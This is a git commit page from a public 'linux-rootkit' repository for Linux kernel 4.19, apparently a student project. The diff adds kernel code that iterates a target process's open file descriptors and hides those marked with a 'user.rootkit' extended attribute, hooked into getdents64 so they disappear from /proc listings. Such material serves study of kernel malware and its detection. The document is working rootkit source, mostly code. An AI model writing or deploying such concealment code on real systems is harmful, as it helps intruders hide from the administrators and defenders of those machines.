linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit e0f2dbfbc2f175ed552c6d16fbe802a8a09c365a
parent 5a8444a83fc6d1df17e42a9d39ef7d208cc6f3c2
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat,  5 Dec 2020 23:01:25 +0100

Add fd stuff

Diffstat:

Msrc/hideopen.c | 39+++++++++++++++++++++++++++++++++++----


Msrc/hideopen.h | 4++++


Msrc/hook.c | 4++--


3 files changed, 41 insertions(+), 6 deletions(-)

diff --git a/src/hideopen.c b/src/hideopen.c
@@ -1,5 +1,9 @@
 #include <linux/slab.h>
 #include <linux/fd.h>
+#include <linux/pid.h>
+#include <linux/sched.h>
+#include <linux/fdtable.h>
+#include <linux/xattr.h>
 
 #include "common.h"
 #include "hook.h"
@@ -16,7 +20,6 @@ fd_list_t hidden_fds = {
 
 fd_list_t_ptr hidden_fds_tail = &hidden_fds;
 
-//Returns pid on success, -1 on failure
 pid_t
 may_fd(struct file *dirfile)
 {
@@ -40,7 +43,9 @@ may_fd(struct file *dirfile)
              **/
             int i = 0;
 
-            while((sub = strsep(&cur, dir_sep))) {
+            while(sub = (strsep(&cur, dir_sep))) {
+                DEBUG_INFO("sub is %s\n", sub);
+
                 switch(i++) {
                     case 1:
                         if(strcmp(sub, "proc"))
@@ -64,13 +69,39 @@ may_fd(struct file *dirfile)
 
     leave:
     kfree(buf);
-    return -1;
+    return 0;
+}
+
+int
+fd_callback(const void *ptr, struct file *f, unsigned fd)
+{
+    struct inode *inode = f->f_inode;
+    char buf[512];
+
+    if(!inode_permission(inode, MAY_READ)) {
+        ssize_t len = vfs_getxattr(f->f_path.dentry, G7_XATTR_NAME, buf, BUFLEN);
+
+        if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL)))
+            add_fd_to_list(&hidden_fds, (int) fd);
+    }
+
+    return 0;
 }
 
 void
 fill_fds(pid_t pid)
 {
-    
+    struct pid *spid;
+    struct task_struct *task;
+    struct files_struct *fs;
+
+    if (!(spid = find_get_pid(pid)) || !(task = pid_task(spid, PIDTYPE_PID)))
+        return;
+
+    if(!(fs = get_files_struct(task)))
+        return;
+
+    iterate_fd(fs, 0, (void *)fd_callback, NULL);    
 }
 
 void
diff --git a/src/hideopen.h b/src/hideopen.h
@@ -4,6 +4,10 @@
 #include <linux/types.h>
 
 #define FD_FROM_NAME(name) ((int)simple_strtol((name), NULL, 10))
+#define G7_XATTR_NAME "user.rootkit"
+#define G7_XATTR_VAL  "rootkit"
+
+#define BUFLEN 512
 
 typedef struct fd_list *fd_list_t_ptr;
 typedef struct fd_list {
diff --git a/src/hook.c b/src/hook.c
@@ -233,9 +233,9 @@ g7_getdents64(const struct pt_regs *pt_regs)
         }
     }
     
-    if(rootkit.hiding_open_files && ((fd_pid = may_fd(dirfile)) != -1)) {
+    if(rootkit.hiding_open_files && (fd_pid = may_fd(dirfile))) {
         is_fd = 1;
-        add_fd_to_list(&hidden_fds, 0);
+        fill_fds(fd_pid);
     }
 
     for (offset = 0; offset < ret;) {